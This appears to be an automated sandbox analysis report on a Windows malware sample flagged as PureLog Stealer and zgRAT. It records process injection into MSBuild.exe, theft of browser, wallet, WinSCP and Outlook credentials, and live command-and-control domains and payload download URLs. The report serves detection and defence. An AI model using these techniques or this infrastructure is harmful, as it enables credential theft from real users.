                  Source: Zqfxk.tmpdb.3.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                  Source: Zqfxk.tmpdb.3.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                  Source: Zqfxk.tmpdb.3.drBinary or memory string: AMC password management pageVMware20,11696428655
                  Source: Zqfxk.tmpdb.3.drBinary or memory string: tasks.office.comVMware20,11696428655o
                  Source: Zqfxk.tmpdb.3.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                  Source: Zqfxk.tmpdb.3.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                  Source: Zqfxk.tmpdb.3.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                  Source: Zqfxk.tmpdb.3.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                  Source: Zqfxk.tmpdb.3.drBinary or memory string: dev.azure.comVMware20,11696428655j
                  Source: Zqfxk.tmpdb.3.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                  Source: MSBuild.exe, 00000007.00000002.3300837372.0000000005AD0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllt
                  Source: Zqfxk.tmpdb.3.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                  Source: MSBuild.exe, 00000003.00000002.2332154673.0000000002CB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                  Source: Zqfxk.tmpdb.3.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                  Source: Zqfxk.tmpdb.3.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                  Source: Zqfxk.tmpdb.3.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeCode function: 0_2_6CEE890A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6CEE890A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeCode function: 0_2_6CEE8431 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6CEE8431
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeCode function: 0_2_6CEE890A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6CEE890A
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exeCode function: 5_2_6C4B707A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_6C4B707A
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exeCode function: 5_2_6C4BB017 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_6C4BB017
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exeCode function: 5_2_6C4B6BA1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_6C4B6BA1
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Allocates memory in foreign processes
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and writeJump to behavior
                  Injects a PE file into a foreign processes
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5AJump to behavior
                  Writes to foreign memory regions
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000Jump to behavior
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000Jump to behavior
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 4D2000Jump to behavior
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 4D8000Jump to behavior
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: A09008Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 44C000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 44E000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: E4A008Jump to behavior
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exe "C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeCode function: 0_2_6CEE8AC8 cpuid 0_2_6CEE8AC8
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeQueries volume information: C:\Users\user\Desktop\x7myVfh5YS.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeCode function: 0_2_6CEE8553 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_6CEE8553
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                  Stealing of Sensitive Information

                  barindex
                  Yara detected PureLog Stealer
                  Source: Yara matchFile source: 3.2.MSBuild.exe.6440000.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.MSBuild.exe.6440000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.2355748328.0000000006440000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Yara detected zgRAT
                  Source: Yara matchFile source: 3.2.MSBuild.exe.6440000.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.MSBuild.exe.6440000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.2355748328.0000000006440000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Found many strings related to Crypto-Wallets (likely being stolen)
                  Source: MSBuild.exe, 00000003.00000002.2332154673.0000000002CB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Electrum4O$
                  Source: MSBuild.exe, 00000003.00000002.2332154673.0000000002CB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Jaxx Liberty
                  Source: MSBuild.exe, 00000003.00000002.2332154673.0000000002CB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Exodus Web3
                  Source: MSBuild.exe, 00000003.00000002.2332154673.0000000002CB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereum4O$
                  Source: MSBuild.exe, 00000003.00000002.2350388575.00000000053F0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: set_UseMachineKeyStore
                  Tries to harvest and steal Bitcoin Wallet information
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-QtJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\monero-project\monero-coreJump to behavior
                  Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\6490c938-fe3f-48ae-bc5e-e1986298f7c1\VERSION.txtJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\6490c938-fe3f-48ae-bc5e-e1986298f7c1\VERSION.txtJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\6490c938-fe3f-48ae-bc5e-e1986298f7c1\VERSION.txtJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: Yara matchFile source: 00000003.00000002.2332154673.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 4256, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected PureLog Stealer
                  Source: Yara matchFile source: 3.2.MSBuild.exe.6440000.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.MSBuild.exe.6440000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.2355748328.0000000006440000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Yara detected zgRAT
                  Source: Yara matchFile source: 3.2.MSBuild.exe.6440000.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.MSBuild.exe.6440000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.2355748328.0000000006440000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts41
                  Windows Management Instrumentation                  		1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		1
                  Disable or Modify Tools                  		1
                  OS Credential Dumping                  		1
                  System Time Discovery                  		Remote Services11
                  Archive Collected Data                  		1
                  Ingress Tool Transfer                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts311
                  Process Injection                  		1
                  Deobfuscate/Decode Files or Information                  		1
                  Credentials in Registry                  		2
                  File and Directory Discovery                  		Remote Desktop Protocol2
                  Data from Local System                  		11
                  Encrypted Channel                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)2
                  Obfuscated Files or Information                  		Security Account Manager45
                  System Information Discovery                  		SMB/Windows Admin Shares1
                  Screen Capture                  		1
                  Non-Standard Port                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook22
                  Software Packing                  		NTDS241
                  Security Software Discovery                  		Distributed Component Object Model1
                  Email Collection                  		2
                  Non-Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  DLL Side-Loading                  		LSA Secrets1
                  Process Discovery                  		SSH1
                  Clipboard Data                  		3
                  Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  Masquerading                  		Cached Domain Credentials51
                  Virtualization/Sandbox Evasion                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items51
                  Virtualization/Sandbox Evasion                  		DCSync1
                  Application Window Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job311
                  Process Injection                  		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1487768 Sample: x7myVfh5YS.exe Startdate: 05/08/2024 Architecture: WINDOWS Score: 100 34 fermazapoved.ru 2->34 36 fp2e7a.wpc.phicdn.net 2->36 38 4 other IPs or domains 2->38 46 Malicious sample detected (through community Yara rule) 2->46 48 Antivirus detection for dropped file 2->48 50 Multi AV Scanner detection for dropped file 2->50 52 13 other signatures 2->52 9 x7myVfh5YS.exe 3 2->9         started        signatures3 process4 file5 28 C:\Users\user\AppData\Roaming\d3d9.dll, PE32 9->28 dropped 30 C:\Users\user\AppData\...\x7myVfh5YS.exe.log, ASCII 9->30 dropped 62 Writes to foreign memory regions 9->62 64 Allocates memory in foreign processes 9->64 66 Injects a PE file into a foreign processes 9->66 13 MSBuild.exe 15 24 9->13         started        18 conhost.exe 9->18         started        signatures6 process7 dnsIp8 42 fermazapoved.ru 62.173.145.78, 443, 49706, 49708 SPACENET-ASInternetServiceProviderRU Russian Federation 13->42 44 188.130.138.23, 49704, 49705, 7702 ASKONTELRU Russian Federation 13->44 32 C:\Users\user\AppData\Local\...\Qqgmpuehc.exe, PE32 13->32 dropped 68 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 13->68 70 Tries to steal Mail credentials (via file / registry access) 13->70 72 Found many strings related to Crypto-Wallets (likely being stolen) 13->72 74 3 other signatures 13->74 20 Qqgmpuehc.exe 3 13->20         started        file9 signatures10 process11 signatures12 54 Multi AV Scanner detection for dropped file 20->54 56 Machine Learning detection for dropped file 20->56 58 Writes to foreign memory regions 20->58 60 2 other signatures 20->60 23 MSBuild.exe 2 20->23         started        26 conhost.exe 20->26         started        process13 dnsIp14 40 access.samp-global.com 91.217.76.162, 54809, 54810, 54811 FIRST-SERVER-EU-ASRU Russian Federation 23->40

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  x7myVfh5YS.exe28%VirustotalBrowse
                  x7myVfh5YS.exe29%ReversingLabs
                  x7myVfh5YS.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Roaming\d3d9.dll100%AviraHEUR/AGEN.1300671
                  C:\Users\user\AppData\Roaming\d3d9.dll100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exe24%ReversingLabsWin32.Trojan.Generic
                  C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exe42%VirustotalBrowse
                  C:\Users\user\AppData\Roaming\d3d9.dll47%ReversingLabsWin32.Trojan.Midie
                  C:\Users\user\AppData\Roaming\d3d9.dll61%VirustotalBrowse

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  SourceDetectionScannerLabelLink
                  bg.microsoft.map.fastly.net0%VirustotalBrowse
                  fermazapoved.ru0%VirustotalBrowse
                  fp2e7a.wpc.phicdn.net0%VirustotalBrowse
                  35.37.15.0.in-addr.arpa0%VirustotalBrowse

                  URLs

                  SourceDetectionScannerLabelLink
                  https://stackoverflow.com/q/14436606/233540%URL Reputationsafe
                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                  https://www.ecosia.org/newtab/0%URL Reputationsafe
                  https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
                  https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                  https://stackoverflow.com/q/11564914/23354;0%URL Reputationsafe
                  https://stackoverflow.com/q/2152978/233540%URL Reputationsafe
                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                  https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL0%URL Reputationsafe
                  https://support.mozilla.org0%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                  https://fermazapoved.ru0%Avira URL Cloudsafe
                  https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
                  https://github.com/mgravell/protobuf-netJ0%Avira URL Cloudsafe
                  https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
                  http://fermazapoved.ru0%Avira URL Cloudsafe
                  https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
                  https://github.com/testdemo345/DemoThing/raw/main/WebDriver.dll0%Avira URL Cloudsafe
                  http://fermazapoved.ru0%VirustotalBrowse
                  https://duckduckgo.com/ac/?q=0%VirustotalBrowse
                  https://github.com/mgravell/protobuf-netJ0%VirustotalBrowse
                  https://duckduckgo.com/chrome_newtab0%VirustotalBrowse
                  https://fermazapoved.ru0%VirustotalBrowse
                  https://github.com/mgravell/protobuf-net0%VirustotalBrowse
                  https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%VirustotalBrowse
                  https://github.com/testdemo345/DemoThing/raw/main/WebDriver.dll0%VirustotalBrowse
                  https://github.com/mgravell/protobuf-net0%Avira URL Cloudsafe
                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
                  https://github.com/testdemo345/DemoThing/raw/main/chromedriver.exe0%Avira URL Cloudsafe
                  https://github.com/testdemo345/DemoThing/raw/main/msedgedriver.exe0%Avira URL Cloudsafe
                  http://fermazapoved.ru/images/h.exe0%Avira URL Cloudsafe
                  https://github.com/mgravell/protobuf-neti0%Avira URL Cloudsafe
                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%VirustotalBrowse
                  https://stackoverflow.com/q/2152978/23354rCannot0%Avira URL Cloudsafe
                  http://www.codeplex.com/DotNetZip0%Avira URL Cloudsafe
                  https://fermazapoved.ru/images/h.exe0%Avira URL Cloudsafe
                  http://fermazapoved.ru/images/h.exe0%VirustotalBrowse
                  https://github.com/testdemo345/DemoThing/raw/main/chromedriver.exe0%VirustotalBrowse
                  https://github.com/mgravell/protobuf-neti0%VirustotalBrowse
                  https://github.com/testdemo345/DemoThing/raw/main/msedgedriver.exe0%VirustotalBrowse
                  http://www.codeplex.com/DotNetZip1%VirustotalBrowse
                  https://stackoverflow.com/q/2152978/23354rCannot0%VirustotalBrowse
                  https://fermazapoved.ru/images/h.exe0%VirustotalBrowse

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  bg.microsoft.map.fastly.net
                  		199.232.214.172
                  		truefalseunknown
                  access.samp-global.com
                  		91.217.76.162
                  		truefalse
                    		unknown
                    fermazapoved.ru
                    		62.173.145.78
                    		truetrueunknown
                    fp2e7a.wpc.phicdn.net
                    		192.229.221.95
                    		truefalseunknown
                    35.37.15.0.in-addr.arpa
                    		unknown
                    		unknownfalseunknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://fermazapoved.ru/images/h.exetrue
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://fermazapoved.ru/images/h.exetrue
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://fermazapoved.ruMSBuild.exe, 00000003.00000002.2332154673.0000000002CB1000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://fermazapoved.ruMSBuild.exe, 00000003.00000002.2332154673.0000000002E29000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://duckduckgo.com/chrome_newtabMSBuild.exe, 00000003.00000002.2335934062.0000000003EC3000.00000004.00000800.00020000.00000000.sdmp, Mgxqpwct.tmpdb.3.dr, Dmhie.tmpdb.3.dr, Ohaadlqgh.tmpdb.3.drfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://duckduckgo.com/ac/?q=MSBuild.exe, 00000003.00000002.2335934062.0000000003EC3000.00000004.00000800.00020000.00000000.sdmp, Mgxqpwct.tmpdb.3.dr, Dmhie.tmpdb.3.dr, Ohaadlqgh.tmpdb.3.drfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://stackoverflow.com/q/14436606/23354MSBuild.exe, 00000003.00000002.2352938527.0000000005A40000.00000004.08000000.00040000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2332154673.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.3278767774.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://github.com/mgravell/protobuf-netJMSBuild.exe, 00000003.00000002.2352938527.0000000005A40000.00000004.08000000.00040000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2335934062.0000000003E95000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://www.google.com/images/branding/product/ico/googleg_lodp.icoMSBuild.exe, 00000003.00000002.2335934062.0000000003EC3000.00000004.00000800.00020000.00000000.sdmp, Mgxqpwct.tmpdb.3.dr, Dmhie.tmpdb.3.dr, Ohaadlqgh.tmpdb.3.drfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://github.com/testdemo345/DemoThing/raw/main/WebDriver.dllMSBuild.exe, 00000007.00000002.3278767774.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://github.com/mgravell/protobuf-netMSBuild.exe, 00000003.00000002.2352938527.0000000005A40000.00000004.08000000.00040000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2335934062.0000000003E95000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=MSBuild.exe, 00000003.00000002.2335934062.0000000003EC3000.00000004.00000800.00020000.00000000.sdmp, Mgxqpwct.tmpdb.3.dr, Dmhie.tmpdb.3.dr, Ohaadlqgh.tmpdb.3.drfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=MSBuild.exe, 00000003.00000002.2335934062.0000000003EC3000.00000004.00000800.00020000.00000000.sdmp, Mgxqpwct.tmpdb.3.dr, Dmhie.tmpdb.3.dr, Ohaadlqgh.tmpdb.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://www.ecosia.org/newtab/MSBuild.exe, 00000003.00000002.2335934062.0000000003EC3000.00000004.00000800.00020000.00000000.sdmp, Mgxqpwct.tmpdb.3.dr, Dmhie.tmpdb.3.dr, Ohaadlqgh.tmpdb.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brTidyi.tmpdb.3.drfalse
                    • URL Reputation: safe
                    		unknown
